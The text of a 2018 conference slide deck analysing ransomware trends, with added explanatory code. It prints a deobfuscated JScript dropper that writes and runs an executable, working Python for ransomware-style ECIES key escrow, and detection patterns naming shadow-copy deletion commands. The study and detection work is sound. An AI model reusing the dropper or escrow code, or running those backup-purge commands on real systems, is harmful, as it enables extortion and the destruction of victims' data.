Slide 1

Hipster Ransomware: Beyond Mere Encryption
Pranshu Bajpai
August 7, 2018
BSides Chicago 2018

Slide 2

Agenda
1. Introduction
2. Hipster Ransomware
3. Attributes
   • Cryptojacking: Best of Both Worlds
   • ECDH: Judging a Book by its Cover
   • Purge Backups: The Whole Nine Yards
   • Dropping Spyware: Adding Insult to Injury
   • Stealing Social Engineering’s Thunder
   • Killswitches: Blessing in Disguise
   • Process Doppelganging: Hiding in Plain Sight
4. Conclusion

Slide 3

Introduction

Slide 4

About us
Pranshu Bajpai
PhD Candidate, Computer Science and Engineering, Michigan State University
http://cse.msu.edu/~bajpaipr/
https://www.linkedin.com/in/pranshubajpai/
https://twitter.com/amirootyet
Richard Enbody
Associate Professor, Computer Science and Engineering, Michigan State University
http://www.cse.msu.edu/~enbody/

Slide 5

Related work
• Young and Yung first formally introduced the concept of cryptoviral extortion (modern ransomware) in 1996
• Young discusses ransomware and Microsoft’s CryptoAPI in 2006
• Kharraz et al. discover in 2015 that only 6% of 1,359 analyzed samples were actually effective

Slide 6

The primary elements of ransomware
• Infiltrate
• Acquire encryption secret (key)
• Encrypt
• Demand ransom

Slide 7

Common hybrid cryptosystem in ransomware
• Ransomware compromises host
• Generates symmetric encryption key
• Encrypts symmetric key with a hard-coded asymmetric key
• Provides attacker a copy of encrypted symmetric key
• Encrypts user data using the symmetric key
• Destroys symmetric key on host
• Displays ransom note

Slide 8

Hipster Ransomware

Slide 9

Hipster Ransomware: Contemporary Subculture
Hipster Ransomware: ransomware variants with innovative features that offer competitive, strategic or operational advantage(s) to the ransomware developer
Why?
• Underground market can be competitive
• Need for continuous innovation
• Throw off malware analysts, even if briefly

Slide 10

Attributes

Slide 11

Attributes: Cryptojacking: Best of Both Worlds

Slide 12

Cryptojacking: Best of Both Worlds
• Cryptojacking is on the rise
• Bundle a mining routine with the ransomware
Why?
• Runs in the background, creates no “noise”
• Especially favorable to ransomware developers in the context of underdeveloped countries
• At least some funds are generated even when the ransom is not paid
• Cryptocurrencies such as Monero make it feasible to mine on an average processor

Slide 13

Attributes: ECDH: Judging a Book by its Cover

Slide 14

ECDH: Judging a Book by its Cover
(Image source: quora.com)
About ECDH
• Elliptic curves: y^2 = x^3 + ax + b
• Elliptic-curve Diffie-Hellman
• Generate a shared secret over insecure channels
• Use the derived symmetric key to encrypt data
Draw a line from a to b, and then continue the line. You intersect only one other point on the elliptic curve.
Ransomware uses the Elliptic Curve Integrated Encryption Scheme, or ECIES

Slide 15

ECDH: Judging a Book by its Cover
Consider secp192k1 as deployed in Petya. Domain parameters over the finite field F: (p, a, b, G, n, h)
• Finite field: p = 2^192 − 2^32 − 2^12 − 2^8 − 2^7 − 2^6 − 2^3 − 1
• Curve: y^2 = x^3 + ax + b over F
• Base point, G = 03DB4FF10EC057E9AE26B07D0280B7F4341DA5D1B1EAE06C7D
• Order of G, n = FFFFFFFFFFFFFFFFFFFFFFFE26F2FC170F69466A74DEFD8D
• Cofactor, h = 01
Domain parameters are public!

Slide 16

ECDH: Judging a Book by its Cover
Encryption steps taken by ransomware to implement ECIES:
• Domain parameters and a public key, P, ship hard-coded with the binary
• Secret integer, s, is kept safe with the attacker

Slide 17

ECDH: Judging a Book by its Cover
Upon infection
• Generate random integer, t, using /dev/urandom or CryptGenRandom
• Q = [t]G
• h = H([t]P) ← encryption key!
• Encrypt using h
• Purge t and h from host
Upon receiving payment
• Demand Q from host
• [s]Q = [t]P ← this property allows the attacker to derive the same point as used on the host
• h = H([s]Q)
• Attacker sends h back to victim
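The key handling on slides 15 to 17, worked through as an added example (not code from the talk or from any ransomware sample): pure-Python point arithmetic on secp192k1 using the slide's p, n and compressed G, with the victim deriving h = H([t]P) and the attacker recovering the same h from Q and s alone. The coefficients a = 0, b = 3 are the SEC 2 values for this curve; the KDF (SHA-256 over the x-coordinate) and the function names are assumptions for the example, not Petya's actual derivation.

```python
import hashlib
import secrets
# secp192k1 (SEC 2): p, n and the compressed G are the values on the slide; a = 0, b = 3.
p = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFEE37
a, b = 0, 3
n = 0xFFFFFFFFFFFFFFFFFFFFFFFE26F2FC170F69466A74DEFD8D
G_SEC1 = bytes.fromhex("03DB4FF10EC057E9AE26B07D0280B7F4341DA5D1B1EAE06C7D")
O = None  # point at infinity

def decompress(sec1):  # SEC1 compressed point -> (x, y); p % 4 == 3 so sqrt is one pow()
    x = int.from_bytes(sec1[1:], "big")
    rhs = (x**3 + a*x + b) % p
    y = pow(rhs, (p + 1) // 4, p)
    if y * y % p != rhs:
        raise ValueError("x is not on the curve: check the domain parameters")
    return (x, y) if (y & 1) == (sec1[0] & 1) else (x, p - y)
G = decompress(G_SEC1)

def add(P, Q):
    if P is O: return Q
    if Q is O: return P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2 and (y1 + y2) % p == 0:
        return O
    if P == Q:
        lam = (3*x1*x1 + a) * pow(2*y1, -1, p) % p
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, p) % p
    x3 = (lam*lam - x1 - x2) % p
    return (x3, (lam*(x1 - x3) - y1) % p)

def mul(k, P):  # plain double-and-add: fine for a demo, not constant-time
    R = O
    while k:
        if k & 1: R = add(R, P)
        P, k = add(P, P), k >> 1
    return R

def kdf(point):  # h = H([t]P); SHA-256 over the x-coordinate is an assumed KDF, not Petya's
    return hashlib.sha256(point[0].to_bytes(24, "big")).digest()
def attacker_keygen():
    s = secrets.randbelow(n - 1) + 1  # s never leaves the attacker
    return s, mul(s, G)               # P = [s]G ships hard-coded in the binary
def victim_encrypt_key(P):
    t = secrets.randbelow(n - 1) + 1  # from /dev/urandom or CryptGenRandom
    Q, h = mul(t, G), kdf(mul(t, P))  # Q is handed to the attacker; t and h are purged
    return Q, h
def attacker_recover_key(s, Q):
    return kdf(mul(s, Q))             # [s]Q = [s][t]G = [t][s]G = [t]P, so the same h
```

Because the domain parameters are public, an analyst can verify them (G on the curve, [n]G = O) but gains nothing toward h without s or t, which is why recovery from a memory dump only works if t was captured before it was purged.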

Slide 19

ECDH: Judging a Book by its Cover
Advantages for the attacker
• Better for marketing
• ECDH not as closely scrutinized as the popular RSA
• Does not depend on resident CryptoAPIs to generate the symmetric key
• Offers the same security as RSA for a smaller key size

Slide 20

Attributes: Purge Backups: The Whole Nine Yards

Slide 21

Purge Backups: The Whole Nine Yards
Backups on host
• Available as a mapped drive on the network AND/OR
• Windows default Volume Shadow Copy snapshots of the C: drive used by ‘System Restore’ AND/OR
• Synced to the cloud using a client
Ransomware
• explicitly hunts for and encrypts network shares
• purges VSS files on the host
• abuses sync clients of cloud services to encrypt files stored in the cloud

Slide 22

Purge Backups: The Whole Nine Yards

Slide 23

Purge Backups: The Whole Nine Yards

Slide 24

Purge Backups: The Whole Nine Yards
WNetAddConnection2W used to map network shares
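A defender's counterpart to slides 21 and 24, added here and not from the talk: process-creation events (constructed sample lines in a simplified key=value layout, not real telemetry) are scanned for shadow-copy deletion commands and for network share mapping, and a parent process that does both is reported. The log layout, the process names and the command-line patterns are assumptions for the example; the patterns cover the documented vssadmin and wmic forms of shadow-copy deletion and "net use" share mapping, which is the user-mode equivalent of the WNetAddConnection2W call on the slide.

```python
import re

# Constructed sample of process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    'ts=2018-08-07T10:01:02 host=ws01 parent=explorer.exe image=C:\\Windows\\System32\\notepad.exe cmd="notepad.exe report.txt"',
    'ts=2018-08-07T10:03:15 host=ws01 parent=invoice.exe image=C:\\Windows\\System32\\vssadmin.exe cmd="vssadmin.exe delete shadows /all /quiet"',
    'ts=2018-08-07T10:03:16 host=ws01 parent=invoice.exe image=C:\\Windows\\System32\\wbem\\WMIC.exe cmd="wmic shadowcopy delete"',
    'ts=2018-08-07T10:03:20 host=ws01 parent=invoice.exe image=C:\\Windows\\System32\\net.exe cmd="net use Z: \\\\fileserver\\backups"',
    'ts=2018-08-07T11:20:00 host=ws02 parent=mmc.exe parent_user=backupadmin image=C:\\Windows\\System32\\vssadmin.exe cmd="vssadmin.exe list shadows"',
]

# Command lines that remove Volume Shadow Copies (the deck's "purge VSS files on host").
SHADOW_PURGE = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
]
# Mapping a UNC share from an arbitrary parent mirrors the WNetAddConnection2W behaviour on slide 24.
SHARE_MAP = re.compile(r"net(\.exe)?\s+use\s+\S+\s+\\\\", re.I)

def parse(line):
    """Split one key=value event line into a dict; quoted values may contain spaces."""
    fields = re.findall(r'(\w+)=("[^"]*"|\S+)', line)
    return {k: v.strip('"') for k, v in fields}

def classify(event):
    cmd = event.get("cmd", "")
    if any(pat.search(cmd) for pat in SHADOW_PURGE):
        return "shadow_copy_purge"
    if SHARE_MAP.search(cmd):
        return "network_share_mapped"
    return None  # e.g. "vssadmin list shadows" run by an admin is benign

def find_purge_and_share(events):
    """Return (host, parent) pairs that both purged shadow copies and mapped a share."""
    seen = {}
    for line in events:
        ev = parse(line)
        tag = classify(ev)
        if tag:
            seen.setdefault((ev["host"], ev["parent"]), set()).add(tag)
    wanted = {"shadow_copy_purge", "network_share_mapped"}
    return sorted(key for key, tags in seen.items() if wanted <= tags)
```

A single shadow-copy deletion can be legitimate administration, so alerting on the combination, or on either action from an unexpected parent such as a document-named executable, keeps the false-positive rate manageable.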

Slide 25

Attributes: Dropping Spyware: Adding Insult to Injury

Slide 27

Dropping Spyware: Adding Insult to Injury
• Drop other malware such as trojans to spy on users
• Attack on data availability and confidentiality
• Not good for reputation, hence not a common practice yet
• No indication that the spyware is removed after payment

Slide 28

Dropping Spyware: Adding Insult to Injury

    function NWvQtGjjfQX() {
        var data_pn = "TVrDiQNMSFE(...)QQURE";   // base64 PE payload ("TVr" = "MZ") with "A" replaced by the marker NMSIOP

        var cmd = "U2FsdGVkX1/LHQl+aIAo/hXHDEI5YmZZtBIcL...";   // AES-encrypted second stage
        var dec_cmd = CryptoJS.AES.decrypt(cmd, key_cmd);
        dec_cmd = CryptoJS.enc.Utf8.stringify(dec_cmd);
        eval(dec_cmd);
        return 0;
    }

    ... // decrypts to the following code // ...
    var flo = new ActiveXObject("ADODB.Stream");
    var runer = WScript.CreateObject("WScript.Shell");
    var wher = runer.SpecialFolders("MyDocuments");
    wher = wher + "\\" + "st.exe";                 // drop location: st.exe in the user's My Documents
    flo.CharSet = "437";
    flo.Open();
    var pny = data_pn.replace(/NMSIOP/g, "A");    // undo the marker substitution before base64-decoding
    var pny_ar = CryptoJS.enc.Base64.parse(pny);
    var pny_dec = pny_ar.toString(CryptoJS.enc.Utf8);
    flo.Position = 0;
    flo.SetEOS;
    flo.WriteText(pny_dec);
    flo.SaveToFile(wher, 2);                       // 2 = adSaveCreateOverWrite
    flo.Close;
    wher = "\"" + wher + "\"";
    runer.Run(wher);                               // execute the dropped binary

Key and IV embedded in the Jigsaw ransomware

Slide 29

Dropping Spyware: Adding Insult to Injury
Trojan dropper observed in RAA ransomware

Slide 30

Attributes: Stealing Social Engineering’s Thunder

Slide 31

Stealing Social Engineering’s Thunder
• Phishing has been the predominant attack vector among malware
• Relies on exploiting human gullibility
• Attackers are moving on to more efficient attack vectors
• WannaCry exploits EternalBlue
• SamSam exploits weak RDP protection

Slide 32

Stealing Social Engineering’s Thunder
WannaCry begins scanning port 445 to exploit EternalBlue

Slide 33

Attributes: Killswitches: Blessing in Disguise

Slide 34

Blessing in Disguise
Killswitch: a control that effectively neutralizes the ransomware such that it never executes its encryption routine.
• Gained widespread attention with WannaCry
• Allows ransomware operators some form of control over the campaign(?)
• Can be exploited by security researchers if outside the attacker’s control
• NotPetya checks for the perfc file in C:\Windows\... ← not really a killswitch
• Will we observe more ransomware killswitches in the future?

Slide 35

Attributes: Process Doppelganging: Hiding in Plain Sight

Slide 36

Process Doppelganging: Hiding in Plain Sight
SynAck Ransomware
• First ransomware discovered to use process doppelganging
• Uses the technique to evade detection by antivirus solutions
• Avoids making unexpected changes to the filesystem
• Doesn’t execute if run from unexpected locations
• Doesn’t execute if the keyboard setting on the host is ‘Cyrillic’
• Primary attack vector is RDP

Slide 40

Process Doppelganging: Hiding in Plain Sight
Process Doppelganging
• First discussed at Black Hat Europe, December 2017, by the enSilo team
• Overwrite an executable with malicious code
• Load malicious executable
• Rollback to original
• Execute malicious code
Ransomware executes in the context of a legitimate process ⇒ AV will not detect the malicious code!

Slide 41

Conclusion

Slide 42

Conclusion
• Ransomware innovates and evolves—just like any other product
• What is hipster today might become a trend tomorrow
• Early anticipation of future malware trends helps create better responses

Slide 43

Questions
• BSides Chicago organizers: for the support!
• Michigan State infosec team: for continuous help and support!
Questions: @amirootyet